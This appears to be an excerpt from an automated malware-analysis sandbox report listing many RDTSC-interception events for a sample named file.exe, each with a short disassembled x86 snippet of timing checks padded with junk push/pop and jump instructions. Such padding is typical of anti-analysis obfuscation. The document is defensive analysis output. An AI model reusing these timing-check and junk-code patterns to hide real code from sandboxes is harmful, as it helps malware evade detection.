Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ED795 second address: 5ED7B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F075D128EF6h 0x0000000a pop edx 0x0000000b jmp 00007F075D128F05h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ED7B5 second address: 5ED7D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F075CBABEC6h 0x0000000a jmp 00007F075CBABED6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ED7D5 second address: 5ED7D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ED7D9 second address: 5ED7DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ED7DF second address: 5ED7E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ED7E8 second address: 5ED7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F393E second address: 5F3944 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F37F7 second address: 5F37FD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F37FD second address: 5F3809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F075D128EF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F3809 second address: 5F380D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EBFAE second address: 5EBFBD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007F075D128EF6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EBFBD second address: 5EBFC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FFF38 second address: 5FFF3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FFF3D second address: 5FFF4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F075CBABECCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6020CA second address: 60211D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F075D128F09h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F075D128F07h 0x00000016 jmp 00007F075D128F05h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60211D second address: 602122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 602122 second address: 60212B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B687 second address: 61B68D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B68D second address: 61B694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B694 second address: 61B6AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F075CBABECFh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B6AA second address: 61B6BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F075D128F14h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B6BB second address: 61B6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F075CBABED8h 0x00000009 jmp 00007F075CBABED4h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B817 second address: 61B839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F075D128F02h 0x0000000c jnc 00007F075D128EF6h 0x00000012 jc 00007F075D128EF6h 0x00000018 push eax 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B839 second address: 61B83D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61BB1E second address: 61BB22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61BB22 second address: 61BB26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620004 second address: 620020 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F075D128F02h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620020 second address: 620025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620025 second address: 62002B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62002B second address: 620063 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F075CBABED7h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 jmp 00007F075CBABECFh 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620063 second address: 620092 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F075D128EFCh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F075D128F02h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62032D second address: 620340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABECFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620340 second address: 620371 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jbe 00007F075D128F0Dh 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 push eax 0x00000018 pop eax 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620371 second address: 62038A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F075CBABEC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F075CBABEC6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62038A second address: 620399 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F075D128EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623698 second address: 6236AD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 ja 00007F075CBABEC6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jl 00007F075CBABECEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE02B2 second address: 4CE02B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE02B6 second address: 4CE02BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE02BC second address: 4CE02D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b mov ecx, 4287383Dh 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD007D second address: 4CD0095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABED4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0095 second address: 4CD00AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD00AD second address: 4CD00B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD00B1 second address: 4CD00B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD00B7 second address: 4CD00D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABED9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD00D4 second address: 4CD00D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00DDD second address: 4D00E5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F075CBABED0h 0x00000010 push eax 0x00000011 jmp 00007F075CBABECBh 0x00000016 xchg eax, ebp 0x00000017 jmp 00007F075CBABED6h 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F075CBABECDh 0x00000027 sbb si, 93C6h 0x0000002c jmp 00007F075CBABED1h 0x00000031 popfd 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00E5A second address: 4D00E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00E5F second address: 4D00E65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00E65 second address: 4D00E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0157 second address: 4CA01C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F075CBABED7h 0x00000009 adc eax, 79C70F9Eh 0x0000000f jmp 00007F075CBABED9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F075CBABED0h 0x0000001b adc al, FFFFFF98h 0x0000001e jmp 00007F075CBABECBh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a mov eax, 20DEE56Bh 0x0000002f push ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA01C0 second address: 4CA0210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push dword ptr [ebp+04h] 0x00000009 jmp 00007F075D128F08h 0x0000000e push dword ptr [ebp+0Ch] 0x00000011 jmp 00007F075D128F00h 0x00000016 push dword ptr [ebp+08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F075D128F07h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0210 second address: 4CA0228 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABED4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA023C second address: 4CA0240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0240 second address: 4CA0246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0246 second address: 4CA0271 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 78C4h 0x00000007 pushfd 0x00000008 jmp 00007F075D128EFDh 0x0000000d jmp 00007F075D128EFBh 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0271 second address: 4CA0275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0275 second address: 4CA0279 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0279 second address: 4CA027F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0C4F second address: 4CC0C55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0C55 second address: 4CC0C66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABECDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0C66 second address: 4CC0C6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0C6A second address: 4CC0C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0C78 second address: 4CC0CF4 instructions: 0x00000000 rdtsc 0x00000002 mov cl, 9Fh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F075D128F01h 0x0000000c and ax, 4726h 0x00000011 jmp 00007F075D128F01h 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [esp], ebp 0x0000001b pushad 0x0000001c mov al, EAh 0x0000001e call 00007F075D128F09h 0x00000023 pushfd 0x00000024 jmp 00007F075D128F00h 0x00000029 sub eax, 7A325B28h 0x0000002f jmp 00007F075D128EFBh 0x00000034 popfd 0x00000035 pop ecx 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0CF4 second address: 4CC0CFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0CFA second address: 4CC0D3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F075D128F09h 0x00000009 adc eax, 4705B9F6h 0x0000000f jmp 00007F075D128F01h 0x00000014 popfd 0x00000015 mov ebx, ecx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ax, bx 0x00000021 mov dh, 6Bh 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0D3E second address: 4CC0D5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABED8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC074E second address: 4CC0767 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0767 second address: 4CC076B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC076B second address: 4CC0771 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC040C second address: 4CC0445 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F075CBABECBh 0x00000012 pop eax 0x00000013 jmp 00007F075CBABED9h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0445 second address: 4CC04BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F075D128F03h 0x0000000b or ah, 0000007Eh 0x0000000e jmp 00007F075D128F09h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007F075D128F01h 0x0000001d xchg eax, ebp 0x0000001e jmp 00007F075D128EFEh 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F075D128F07h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0338 second address: 4CD033D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD033D second address: 4CD0343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0343 second address: 4CD0347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0347 second address: 4CD03D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ecx, ebx 0x0000000c popad 0x0000000d mov dword ptr [esp], ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F075D128F01h 0x00000017 sbb eax, 5B428786h 0x0000001d jmp 00007F075D128F01h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F075D128F00h 0x00000029 jmp 00007F075D128F05h 0x0000002e popfd 0x0000002f popad 0x00000030 mov ebp, esp 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F075D128EFCh 0x00000039 and ecx, 06562C88h 0x0000003f jmp 00007F075D128EFBh 0x00000044 popfd 0x00000045 push eax 0x00000046 push edx 0x00000047 mov ecx, 0954B115h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00D49 second address: 4D00D66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00D66 second address: 4D00D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075D128EFCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00D76 second address: 4D00D7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0561 second address: 4CE0567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0567 second address: 4CE056B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE056B second address: 4CE057A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE057A second address: 4CE05A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F075CBABED0h 0x00000008 pop ecx 0x00000009 jmp 00007F075CBABECBh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE05A4 second address: 4CE05A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE05A8 second address: 4CE05C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE05C3 second address: 4CE066D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F075D128EFFh 0x00000008 pop esi 0x00000009 mov al, dh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [ebp+08h] 0x00000011 jmp 00007F075D128F00h 0x00000016 and dword ptr [eax], 00000000h 0x00000019 pushad 0x0000001a push eax 0x0000001b mov eax, ebx 0x0000001d pop ebx 0x0000001e pushfd 0x0000001f jmp 00007F075D128F06h 0x00000024 and eax, 18AB7FF8h 0x0000002a jmp 00007F075D128EFBh 0x0000002f popfd 0x00000030 popad 0x00000031 and dword ptr [eax+04h], 00000000h 0x00000035 pushad 0x00000036 mov dx, cx 0x00000039 push ecx 0x0000003a pushfd 0x0000003b jmp 00007F075D128F07h 0x00000040 and al, 0000006Eh 0x00000043 jmp 00007F075D128F09h 0x00000048 popfd 0x00000049 pop eax 0x0000004a popad 0x0000004b pop ebp 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F075D128EFAh 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC05F1 second address: 4CC061F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F075CBABED1h 0x0000000a adc cx, DD76h 0x0000000f jmp 00007F075CBABED1h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC061F second address: 4CC0645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F075D128EFDh 0x00000012 rdtsc
